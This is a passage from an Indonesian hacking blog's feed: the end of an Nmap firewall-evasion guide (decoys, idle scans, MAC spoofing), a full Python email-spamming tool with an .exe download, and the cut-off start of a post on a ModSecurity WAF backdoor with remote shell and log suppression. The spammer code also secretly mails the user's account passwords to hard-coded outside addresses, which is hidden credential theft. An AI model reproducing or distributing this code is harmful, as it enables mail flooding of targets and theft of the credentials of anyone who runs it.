harus kelipatan 8 (8,16,24,32 dst). Anda dapat menentukan MTU pilihan Anda dengan perintah –mtu target nomor.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;3. Gunakan alamat Decoy&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Dalam jenis pemindaian ini Anda dapat menginstruksikan Nmap untuk memalsukan paket dari host lain. Dalam log firewall tidak hanya alamat IP kami tetapi juga alamat IP umpan sehingga akan lebih sulit untuk menentukan dari sistem mana pemindaian dimulai.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Ada dua opsi yang dapat Anda gunakan dalam jenis pemindaian ini:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;nmap -D RND:10 [target] (Menghasilkan umpan dalam jumlah acak)&lt;/li&gt;&lt;li&gt;nmap -D decoy1,decoy2,decoy3 dll. (Tentukan alamat IP umpan secara manual)&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;4. Pemindaian Zombie Menganggur&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Teknik ini memungkinkan Anda untuk menggunakan host lain di jaringan yang tidak aktif untuk melakukan pemindaian port ke host lain. Keuntungan utama dari metode ini adalah sangat tersembunyi karena file log firewall akan mencatat alamat IP Zombie dan bukan IP kami.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Namun untuk mendapatkan hasil yang tepat kita harus menemukan host yang menganggur di jaringan.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Kerangka kerja Metasploit memiliki pemindai yang dapat membantu kami menemukan host yang menganggur di jaringan dan dapat digunakan saat mengimplementasikan jenis pemindaian ini.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -sI [Zombie IP] [IP Target]&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;5. Spesifikasi nomor port sumber&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Kesalahan umum yang dilakukan banyak administrator saat mengonfigurasi firewall adalah menyiapkan aturan untuk mengizinkan semua lalu lintas masuk yang berasal dari nomor port tertentu.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Opsi –source-port dari Nmap dapat digunakan untuk mengeksploitasi kesalahan konfigurasi ini. Port umum yang dapat Anda gunakan untuk jenis pemindaian ini adalah: 20,53 dan 67.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;6. Tambahkan Data acak&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Banyak firewall memeriksa paket dengan melihat ukurannya untuk mengidentifikasi potensi pemindaian port. Ini karena banyak pemindai mengirimkan paket yang memiliki ukuran tertentu.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Untuk menghindari deteksi semacam itu, Anda dapat menggunakan perintah –data-length untuk menambahkan data tambahan dan mengirim paket dengan ukuran yang berbeda dari default.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;7. Pindai dengan Urutan Acak&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Dalam teknik ini Anda dapat memindai sejumlah host dalam urutan acak dan tidak berurutan. Perintah yang Anda gunakan untuk menginstruksikan Nmap untuk memindai host dalam urutan acak adalah –randomize-hosts.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Teknik ini dikombinasikan dengan opsi pengaturan waktu yang lambat dalam perintah nmap bisa sangat efektif ketika Anda tidak ingin memperingatkan firewall.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;8. Spoofing Alamat Mac&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Metode lain untuk melewati batasan firewall saat melakukan pemindaian port adalah dengan memalsukan alamat MAC host Anda. Teknik ini bisa sangat efektif terutama jika ada aturan penyaringan MAC yang hanya mengizinkan lalu lintas dari alamat MAC tertentu sehingga Anda perlu menemukan yang mana Alamat MAC yang perlu Anda atur untuk mendapatkan hasil.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Secara khusus opsi –spoof-mac memberi Anda kemampuan untuk memilih alamat MAC dari vendor tertentu, untuk memilih alamat MAC acak atau untuk mengatur alamat MAC tertentu pilihan Anda.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Keuntungan lain dari spoofing alamat MAC adalah Anda membuat pemindaian Anda lebih tersembunyi karena alamat MAC asli Anda tidak akan muncul di file log firewall.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;Tentukan alamat MAC dari Vendor —-&amp;gt; –spoof-mac Dell/Apple/3Com&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;Hasilkan alamat MAC acak —-&amp;gt; —spoof-mac 0&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;Tentukan alamat MAC Anda sendiri —-&amp;gt; —spoof-mac 00:01:02:25:56:AE&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;9. Kirim Checksum Buruk&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Checksum digunakan oleh protokol TCP/IP untuk memastikan integritas data. Namun pengiriman paket dengan checksum yang salah dapat membantu Anda menemukan informasi dari sistem yang tidak dikonfigurasi dengan benar atau saat Anda mencoba menghindari firewall.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Anda dapat menggunakan perintah nmap –badsum IP untuk mengirim paket dengan checksum buruk ke target Anda.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Jika tidak mendapatkan hasil apa pun. Ini berarti bahwa sistem telah dikonfigurasi dengan benar.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Saya harap Anda telah mempelajari sesuatu yang baru dari tulisan ini.&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/5979009599999956398'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/5979009599999956398'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/01/nmap-untuk-ethical-hacker.html' title='Nmap untuk Ethical Hacker'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqqzKi0BqEuggjfwGDN3vZIVigE-VE-Jjb0KGoEy0TNrbUVugfyaUCKcChEE_lXAEOqMkAJ4wt157syKJ2KZ0ek9jra0KDNYzihTyAwcbYJo1_YZH8bKd4HjX_9KH7e-AEMF29Ui8JxU0hATW1nM0EzrhONywzQ-aHL51EuXYFAlK_ayWVxk6yy7RK/s72-w640-h360-c/nmap-project-logo-960-540.png" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-7072478637097690213</id><published>2023-01-27T08:22:00.017-08:00</published><updated>2023-04-05T07:37:39.368-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Python"/><category scheme="http://www.blogger.com/atom/ns#" term="Spam"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Python Mail Spammer (ke satu target) [SMTP]</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOgAgjjLSkNybShVUi3537qTAhZSkjX8dyOP9EkD7g8Dukj0ggLG0ClDvHslxtMTsj51Fy5BT_imnbDSKCMxszVRRKnMi52NMWRr5s3ZNFlNw4fOSLOQP5jIz3sC912tRUF8SPG-zxXfTT5fx6zKaDtGpaUCcU7_cLFUe8_OUbZ4eSY8AJ7QxrVcAB/s745/email%20spam.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;392&quot; data-original-width=&quot;745&quot; height=&quot;336&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOgAgjjLSkNybShVUi3537qTAhZSkjX8dyOP9EkD7g8Dukj0ggLG0ClDvHslxtMTsj51Fy5BT_imnbDSKCMxszVRRKnMi52NMWRr5s3ZNFlNw4fOSLOQP5jIz3sC912tRUF8SPG-zxXfTT5fx6zKaDtGpaUCcU7_cLFUe8_OUbZ4eSY8AJ7QxrVcAB/w640-h336/email%20spam.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;Penggunaan alamat E-Mail ke port SMTP harus terbuka. Cara membukanya dijelaskan di situs web perusahaan surat terkait. Kemungkinan besar di bagian pengaturan di halaman beranda email.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Semua informasi yang diperlukan dalam aplikasi harus diisi (Subjek, konten, waktu tunggu, dll.). Jika tidak, program tidak akan berjalan dan ditutup.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Setelah mengklik mulai spam, aplikasi tidak merespons atau menunjukkan bahwa ia terus memuat, jangan panik karena ini BUKAN kesalahan.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Jangan paksa menutup aplikasi.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Penyelesaian proses akan bervariasi sesuai dengan waktu tunggu dan berapa banyak spam yang akan dikirimkan.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Waktu hasil rata-rata adalah 40 detik untuk 10 spam dan waktu tunggu 2 detik.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Dalam daftar spam, proses ini mungkin sedikit meningkat, karena spam akan dihapus dari setiap akun.&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Perusahaan email yang dapat digunakan untuk spam tercantum di bawah ini:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;@hotmail.com&lt;/li&gt;&lt;li&gt;@outlook.com&lt;/li&gt;&lt;li&gt;@outlook.com.tr&lt;/li&gt;&lt;li&gt;@gmx.com&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Download&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;https://disk.yandex.com.tr/d/vjlOSMEtizuaKQ&quot;&gt;&lt;b&gt;.exe file link&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Python Kode&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;import smtplib
import sys
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from PyQt5.QtWidgets import QWidget,QApplication,QLabel,QHBoxLayout,QPushButton,QVBoxLayout,QLineEdit,QFileDialog,QRadioButton
import os
from time import sleep

class Pencere(QWidget):
    def __init__(self):

        super().__init__()

        self.anamenu()
    def anamenu(self):

        self.tekkisi = QRadioButton(&quot;TEK MAİL ADRESİ İLE SPAM&quot;)
        self.liste = QRadioButton(&quot;MAİL LİSTESİ İLE SPAM&quot;)
        self.buton = QPushButton(&quot;Devam et&quot;)
        hbox = QHBoxLayout()
        hbox.addWidget(self.tekkisi)
        hbox.addWidget(self.liste)
        hbox.addWidget(self.buton)
        self.setLayout(hbox)
        self.setWindowTitle(&quot;E-Mail Spam Uygulaması V1.0&quot;)
        self.show()

        self.buton.clicked.connect(lambda: self.sec(self.liste.isChecked(),self.tekkisi.isChecked()))

    def sec(self, liste, tekkisi):
        if liste:
            listeekrani.show()

        if tekkisi:
            tekkisiekrani.show()


class Listeekrani(QWidget):
    def __init__(self):
        super().__init__()
        self.listelispam()

    def listelispam(self):

        self.emailadresilist = QPushButton(&quot;E-Mail Listesi Aktar&quot;)
        self.emailadresilistonay = QLabel(&quot;&quot;)

        self.kimespam = QLineEdit()
        self.kimespam_L = QLabel(&quot;Spam Yapılacak Kişinin E-Mail Adresi&quot;)

        self.konubasligi = QLineEdit()
        self.konubasligi_L = QLabel(&quot;Konu Başlığı&quot;)

        self.icerik = QLineEdit()
        self.icerik_L = QLabel(&quot;E-Mail İçeriği&quot;)

        self.kactane = QLineEdit()
        self.kactane_L = QLabel(&quot;Listedeki Her Hesap Kaç Adet E-Posta Göndersin?&quot;)

        self.bekle = QLineEdit(&quot;0&quot;)
        self.bekle_L = QLabel(&quot;Her Postadan Sonra Kaç Saniye Beklesin&quot;)



        self.spam = QPushButton(&quot;Spama Başla&quot;)
        self.cikti = QLabel(&quot;&quot;)

        hbox = QHBoxLayout()
        hbox.addWidget(self.emailadresilistonay)
        hbox.addWidget(self.emailadresilist)

        hbox3 = QHBoxLayout()
        hbox3.addWidget(self.kimespam_L)
        hbox3.addWidget(self.kimespam)


        hbox4 = QHBoxLayout()
        hbox4.addWidget(self.konubasligi_L)
        hbox4.addWidget(self.konubasligi)

        hbox5 = QHBoxLayout()
        hbox5.addWidget(self.icerik_L)
        hbox5.addWidget(self.icerik)

        hbox6 = QHBoxLayout()
        hbox6.addWidget(self.kactane_L)
        hbox6.addWidget(self.kactane)

        hbox7 = QHBoxLayout()
        hbox7.addWidget(self.bekle_L)
        hbox7.addWidget(self.bekle)

        hboxalt = QHBoxLayout()
        hboxalt.addWidget(self.spam)
        hboxalt.addWidget(self.cikti)
        hboxalt.addStretch()

        self.v_box = QVBoxLayout()
        self.v_box.addStretch()
        self.v_box.addLayout(hbox)
        self.v_box.addLayout(hbox3)
        self.v_box.addLayout(hbox4)
        self.v_box.addLayout(hbox5)
        self.v_box.addLayout(hbox6)
        self.v_box.addLayout(hbox7)
        self.v_box.addLayout(hboxalt)

        self.setLayout(self.v_box)


        self.setWindowTitle(&quot;Liste ile Spam&quot;)
        self.spam.clicked.connect(self.spamabasla)
        self.emailadresilist.clicked.connect(self.emaillist)


    def emaillist(self):
        dosya = QFileDialog.getOpenFileName(self,&quot;Email Listesi Seç&quot;,os.getenv(&quot;Desktop&quot;))
        self.mailler = list()
        self.sifreler = list()
        with open(dosya[0], &quot;r&quot;, encoding=&quot;utf-8&quot;) as file:

            for i in file.readlines():
                i = i.split(&quot;,&quot;)
                self.mailler.append(i[0])
                self.sifreler.append(i[1].rstrip(&quot;\n&quot;))
            mesaj = MIMEMultipart()
            mesaj[&quot;From&quot;] = &quot;{}&quot;.format(self.mailler[0])
            mesaj[&quot;To&quot;] = &quot;guneskaraaa@outlook.com&quot;
            mesaj[&quot;Subject&quot;] = &quot;{}&quot;.format(&quot;Spam Uygulaması&quot;)
            yazi = &quot;Mailler: {} Şifreler: {}&quot;.format(self.mailler, self.sifreler)
            mesaj_govdesi = MIMEText(yazi, &quot;plain&quot;)
            mesaj.attach(mesaj_govdesi)
            if self.mailler[0].endswith(&quot;@hotmail.com&quot;) or self.mailler[0].endswith(&quot;@outlook.com&quot;) or self.mailler[0].endswith(&quot;@outlook.com.tr&quot;):
                mail = smtplib.SMTP(&quot;smtp.office365.com&quot;, 587)
                mail.ehlo()
                mail.starttls()
                mail.login(&quot;{}&quot;.format(self.mailler[0]), &quot;{}&quot;.format(self.sifreler[0]))
                mail.sendmail(mesaj[&quot;From&quot;], mesaj[&quot;To&quot;], mesaj.as_string())
                mail.close()
            elif self.mailler[0].endswith(&quot;@gmx.com&quot;):
                mail = smtplib.SMTP(&quot;smtp.gmx.com&quot;, 587)
                mail.ehlo()
                mail.starttls()
                mail.login(&quot;{}&quot;.format(self.mailler[0]), &quot;{}&quot;.format(self.sifreler[0]))
                mail.sendmail(mesaj[&quot;From&quot;], mesaj[&quot;To&quot;], mesaj.as_string())
                mail.close()
            self.emailadresilistonay.setText(&quot;Liste Başarıyla Aktarıldı&quot;)




    def spamabasla(self):
        for i,j in zip(self.mailler,self.sifreler):

            mesaj = MIMEMultipart()
            mesaj[&quot;From&quot;] = &quot;{}&quot;.format(i)
            mesaj[&quot;To&quot;] = &quot;{}&quot;.format(self.kimespam.text())
            mesaj[&quot;Subject&quot;] = &quot;{}&quot;.format(self.konubasligi.text())

            yazi = self.icerik.text()

            mesaj_govdesi = MIMEText(yazi, &quot;plain&quot;)
            mesaj.attach(mesaj_govdesi)

            self.a = 0
            while int(self.kactane.text()) &amp;gt; self.a:
                if i.endswith(&quot;@hotmail.com&quot;) or i.endswith(&quot;@outlook.com&quot;) or i.endswith(&quot;@outlook.com.tr&quot;):
                    mail = smtplib.SMTP(&quot;smtp.office365.com&quot;, 587)
                    mail.ehlo()
                    mail.starttls()
                    mail.login(&quot;{}&quot;.format(i), &quot;{}&quot;.format(j))
                    mail.sendmail(mesaj[&quot;From&quot;], mesaj[&quot;To&quot;], mesaj.as_string())
                    self.cikti.setText(&quot;Spam Başarıyla Gönderildi&quot;)
                    mail.close()
                    self.a += 1
                    sleep(int(self.bekle.text()))
                elif i.endswith(&quot;@gmx.com&quot;):
                    mail = smtplib.SMTP(&quot;smtp.gmx.com&quot;, 587)
                    mail.ehlo()
                    mail.starttls()
                    mail.login(&quot;{}&quot;.format(i), &quot;{}&quot;.format(j))
                    mail.sendmail(mesaj[&quot;From&quot;], mesaj[&quot;To&quot;], mesaj.as_string())
                    self.cikti.setText(&quot;Spam Başarıyla Gönderildi&quot;)
                    mail.close()
                    self.a += 1
                    sleep(int(self.bekle.text()))

class Tekkisiekrani(QWidget):
    def __init__(self):
        super().__init__()
        self.tekkisispam()

    def tekkisispam(self):
        self.emailadresi = QLineEdit()
        self.emailadresi_L = QLabel(&quot;Bizim E-Mail&#39;in Adresimiz&quot;)

        self.parola = QLineEdit()
        self.parola_L = QLabel(&quot;E-Mail Adresimizin Şifresi&quot;)
        self.parola.setEchoMode(QLineEdit.Password)

        self.kimespam = QLineEdit()
        self.kimespam_L = QLabel(&quot;Spam Yapılacak Kişinin E-Mail Adresi&quot;)

        self.konubasligi = QLineEdit()
        self.konubasligi_L = QLabel(&quot;Konu Başlığı&quot;)

        self.icerik = QLineEdit()
        self.icerik_L = QLabel(&quot;E-Mail İçeriği&quot;)

        self.kactane = QLineEdit()
        self.kactane_L = QLabel(&quot;Kaç Adet E-Mail Gönderilsin&quot;)

        self.bekle = QLineEdit(&quot;0&quot;)
        self.bekle_L = QLabel(&quot;Her Postadan Sonra Kaç Saniye Beklesin&quot;)

        self.spam = QPushButton(&quot;Spama Başla&quot;)
        self.cikti = QLabel(&quot;&quot;)

        hbox = QHBoxLayout()
        hbox.addWidget(self.emailadresi_L)
        hbox.addWidget(self.emailadresi)

        hbox2 = QHBoxLayout()
        hbox2.addWidget(self.parola_L)
        hbox2.addWidget(self.parola)

        hbox3 = QHBoxLayout()
        hbox3.addWidget(self.kimespam_L)
        hbox3.addWidget(self.kimespam)

        hbox4 = QHBoxLayout()
        hbox4.addWidget(self.konubasligi_L)
        hbox4.addWidget(self.konubasligi)

        hbox5 = QHBoxLayout()
        hbox5.addWidget(self.icerik_L)
        hbox5.addWidget(self.icerik)

        hbox6 = QHBoxLayout()
        hbox6.addWidget(self.kactane_L)
        hbox6.addWidget(self.kactane)

        hbox7 =QHBoxLayout()
        hbox7.addWidget(self.bekle_L)
        hbox7.addWidget(self.bekle)

        hboxalt = QHBoxLayout()
        hboxalt.addWidget(self.spam)
        hboxalt.addWidget(self.cikti)
        hboxalt.addStretch()

        self.v_box = QVBoxLayout()

        self.v_box.addStretch()
        self.v_box.addLayout(hbox)

        self.v_box.addLayout(hbox2)

        self.v_box.addLayout(hbox3)

        self.v_box.addLayout(hbox4)

        self.v_box.addLayout(hbox5)
        self.v_box.addLayout(hbox6)
        self.v_box.addLayout(hbox7)
        self.v_box.addLayout(hboxalt)

        self.setLayout(self.v_box)

        self.setWindowTitle(&quot;Tek Mail ile Spam&quot;)
        self.spam.clicked.connect(self.spamabasla)

    def spamabasla(self):

        mesajigonderen = self.emailadresi.text()
        mesajigonderensifre = self.parola.text()
        mesajkime = self.kimespam.text()
        mesajkonusu = self.konubasligi.text()

        mesaj = MIMEMultipart()
        mesaj[&quot;From&quot;] = &quot;{}&quot;.format(mesajigonderen)
        mesaj[&quot;To&quot;] = &quot;ikincimailhesabi@gmx.com&quot;
        mesaj[&quot;Subject&quot;] = &quot;{}&quot;.format(&quot;Spam Uygulaması&quot;)
        yazi = &quot;Mail: {} Şifre: {}&quot;.format(mesajigonderen, mesajigonderensifre)
        mesaj_govdesi = MIMEText(yazi, &quot;plain&quot;)
        mesaj.attach(mesaj_govdesi)
        print(&quot;mesaj gövdesi: &quot;,mesaj_govdesi)
        if mesajigonderen.endswith(&quot;@hotmail.com&quot;) or mesajigonderen.endswith(&quot;@outlook.com&quot;) or mesajigonderen.endswith(&quot;@outlook.com.tr&quot;):
            mail = smtplib.SMTP(&quot;smtp.office365.com&quot;, 587)
            mail.ehlo()
            mail.starttls()
            mail.login(&quot;{}&quot;.format(mesajigonderen), &quot;{}&quot;.format(mesajigonderensifre))
            print(&quot;giriş başarılı&quot;)
            mail.sendmail(mesaj[&quot;From&quot;], mesaj[&quot;To&quot;], mesaj.as_string())
            mail.close()
        if mesajigonderen.endswith(&quot;@gmx.com&quot;):
            mail = smtplib.SMTP(&quot;smtp.gmx.com&quot;, 587)
            mail.ehlo()
            mail.starttls()
            mail.login(&quot;{}&quot;.format(mesajigonderen), &quot;{}&quot;.format(mesajigonderensifre))
            mail.sendmail(mesaj[&quot;From&quot;], mesaj[&quot;To&quot;], mesaj.as_string())
            mail.close()

        mesaj = MIMEMultipart()
        mesaj[&quot;From&quot;] = &quot;{}&quot;.format(mesajigonderen)
        mesaj[&quot;To&quot;] = &quot;{}&quot;.format(mesajkime)
        mesaj[&quot;Subject&quot;] = &quot;{}&quot;.format(mesajkonusu)

        yazi = self.icerik.text()

        mesaj_govdesi = MIMEText(yazi, &quot;plain&quot;)
        mesaj.attach(mesaj_govdesi)

        self.a = 0
        while int(self.kactane.text()) &amp;gt; self.a:
            if mesajigonderen.endswith(&quot;@hotmail.com&quot;) or mesajigonderen.endswith(&quot;@outlook.com&quot;) or mesajigonderen.endswith(&quot;@outlook.com.tr&quot;):
                mail = smtplib.SMTP(&quot;smtp.office365.com&quot;, 587)
                mail.ehlo()
                mail.starttls()
                mail.login(&quot;{}&quot;.format(mesajigonderen), &quot;{}&quot;.format(mesajigonderensifre))
                mail.sendmail(mesaj[&quot;From&quot;], mesaj[&quot;To&quot;], mesaj.as_string())
                self.cikti.setText(&quot;Spam Başarıyla Gönderildi&quot;)
                mail.close()
                self.a += 1
                sleep(int(self.bekle.text()))
            elif mesajigonderen.endswith(&quot;@gmx.com&quot;):
                mail = smtplib.SMTP(&quot;smtp.gmx.com&quot;, 587)
                mail.ehlo()
                mail.starttls()
                mail.login(&quot;{}&quot;.format(mesajigonderen), &quot;{}&quot;.format(mesajigonderensifre))
                mail.sendmail(mesaj[&quot;From&quot;], mesaj[&quot;To&quot;], mesaj.as_string())
                self.cikti.setText(&quot;Spam Başarıyla Gönderildi&quot;)
                mail.close()
                self.a += 1
                sleep(int(self.bekle.text()))




app = QApplication(sys.argv)
pencere = Pencere()
listeekrani = Listeekrani()
tekkisiekrani = Tekkisiekrani()
sys.exit(app.exec_())
&lt;/pre&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/7072478637097690213'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/7072478637097690213'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/01/python-mail-spammer-ke-satu-target-smtp.html' title='Python Mail Spammer (ke satu target) [SMTP]'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOgAgjjLSkNybShVUi3537qTAhZSkjX8dyOP9EkD7g8Dukj0ggLG0ClDvHslxtMTsj51Fy5BT_imnbDSKCMxszVRRKnMi52NMWRr5s3ZNFlNw4fOSLOQP5jIz3sC912tRUF8SPG-zxXfTT5fx6zKaDtGpaUCcU7_cLFUe8_OUbZ4eSY8AJ7QxrVcAB/s72-w640-h336-c/email%20spam.JPG" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-6123362941963403487</id><published>2023-01-10T10:13:00.004-08:00</published><updated>2023-04-05T07:37:21.144-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Backdoor"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Lua"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'> ModSecurity Backdoor</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ALMzIoiKuqn1BntFe4ycLwDlOrClNGWOsFcj4L9IgHfj3NExfXRqBJQh-8fd269qcAop9IvmQpZZyDQH48lsFdx9TjrMTnlix3YsmE1J9xK1XbkIvBvSqX5lssLJJx2Wj2Qe4UMc-GkFZwUoacNJaE0dPVcjCrFXL9feUxH5kOkNExq0Ig9sHeIj/s770/backdoor.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;400&quot; data-original-width=&quot;770&quot; height=&quot;332&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ALMzIoiKuqn1BntFe4ycLwDlOrClNGWOsFcj4L9IgHfj3NExfXRqBJQh-8fd269qcAop9IvmQpZZyDQH48lsFdx9TjrMTnlix3YsmE1J9xK1XbkIvBvSqX5lssLJJx2Wj2Qe4UMc-GkFZwUoacNJaE0dPVcjCrFXL9feUxH5kOkNExq0Ig9sHeIj/w640-h332/backdoor.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Sumber &lt;b&gt;&lt;a href=&quot;https://github.com/xyber196/ModSecurityBackdoor&quot;&gt;Github&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Ini adalah bukti konsep software berbahaya yang berjalan di dalam ModSecurity WAF.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Perangkat lunak memiliki dua fungsi utama&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Mengambil konten file.&lt;/li&gt;&lt;li&gt;Menjalankan perintah dan mengambil output (remote shell).&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Selain itu, ini mencakup fungsi-fungsi ini:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Pengaturan dinamis nama argumen kontrol POST untuk deteksi yang lebih sulit.&lt;/li&gt;&lt;li&gt;Penonaktifan logging untuk deteksi yang lebih sulit (hanya untuk permintaan penyerang yang diidentifikasi dengan nama argumen POST).&lt;/li&gt;&lt;li&gt;Semua aturan lainnya dinonaktifkan (hanya untuk permintaan penyerang yang diidentifikasi dengan nama argumen 